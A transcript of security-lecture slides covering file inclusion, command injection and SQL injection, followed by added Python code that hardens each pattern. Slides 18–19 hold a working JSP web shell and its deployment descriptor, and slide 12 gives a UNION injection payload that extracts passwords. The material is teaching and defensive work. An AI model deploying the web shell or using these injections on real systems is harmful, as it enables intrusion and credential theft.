Internet Application Security, Autumn 2013, Lecture 3
Transcript

  • 1. Hypothesis ← no ← Check → yes → Goal achieved
  • 2. GET/POST parameters, file uploads, cookies, headers, external sources
  • 3. LFI/RFI, command injection, SQL injection, arbitrary file upload
  • 4. … Name = query; Print(LoadFile(Name)); … http://target.com?getfile=valid http://target.com?getfile=invalid
  • 5. http://target.com?getfile=index
  • 6. http://target.com?getfile=index http://target.com?getfile=target
  • 7. … Name = query + ".txt"; Print(LoadFile(Name)); …
  • 8. … Name = query + ".txt"; Print(LoadFile(Name)); …
  • 9. … Param = query; System("ping -c 1 " + Param); …
  • 10. … Param = query; System("ping -c 1 " + Param); …
  • 11. … Param = query; System("ping -c 1 " + Param); …
  • 12. … Q = "select username from users where id=" + req_id; print(db_query(Q)); … Detect: ' and 1=1 / ' and 1=0; ' and benchmark(9999999,md5(1)). Exploit: ' union select 1,2,3,4,5 from table2 -- comment out. http://target.com/?id=-1 union select password from users -- c → select username from users where id=-1 union select password from users -- c
  • 13. Scanning:
  • 14. Identification:
  • 15. Vulnerability:
  • 16. Vulnerability:
  • 17. Exploitation:
  • 18. cmd.jsp: <%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> Commands with JSP <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %></pre></BODY></HTML>
  • 19. WEB-INF/web.xml: <?xml version="1.0" ?> <web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4"> <servlet> <servlet-name>Command</servlet-name> <jsp-file>/cmd.jsp</jsp-file> </servlet> </web-app>
  • 20. Exploitation:
  • 21. Exploitation:
  • 22. Result:
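
Hardened counterparts to the three vulnerable pseudocode patterns on slides 4 to 12 (LoadFile, ping, and the concatenated SQL query), given as an added example that is not part of the original slides. The function names, the base directory argument and the sample users table are assumptions made for illustration.

```python
import ipaddress
import sqlite3
from pathlib import Path


def load_file(base_dir, name):
    """Slides 4-8: serve a file only if it resolves inside base_dir."""
    base = Path(base_dir).resolve()
    target = (base / (name + ".txt")).resolve()
    # resolve() collapses "../" and symlinks; compare whole path components,
    # not string prefixes, so "/srv/pub-evil" does not pass for "/srv/pub".
    if base not in target.parents:
        raise PermissionError("requested path escapes the base directory")
    return target.read_text()


def ping_argv(param):
    """Slides 9-11: build the ping command without a shell.

    The parameter must parse as an IP literal (ValueError otherwise), and the
    result is an argv list for subprocess.run(argv) with shell=False, so
    characters such as ';' or '|' are never interpreted.
    """
    addr = ipaddress.ip_address(param)
    return ["ping", "-c", "1", str(addr)]


def username_by_id(conn, req_id):
    """Slide 12: same query, with the id type-checked and bound as a parameter."""
    row = conn.execute(
        "select username from users where id = ?", (int(req_id),)
    ).fetchone()
    return row[0] if row else None


def demo_db():
    """Constructed sample data standing in for the slide's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer, username text, password text)")
    conn.execute("insert into users values (1, 'alice', 'constructed-secret')")
    return conn


if __name__ == "__main__":
    conn = demo_db()
    print(username_by_id(conn, "1"))
    print(ping_argv("192.0.2.1"))
    for bad in ("-1 union select password from users -- c",):
        try:
            username_by_id(conn, bad)
        except ValueError as exc:
            print("rejected:", exc)
```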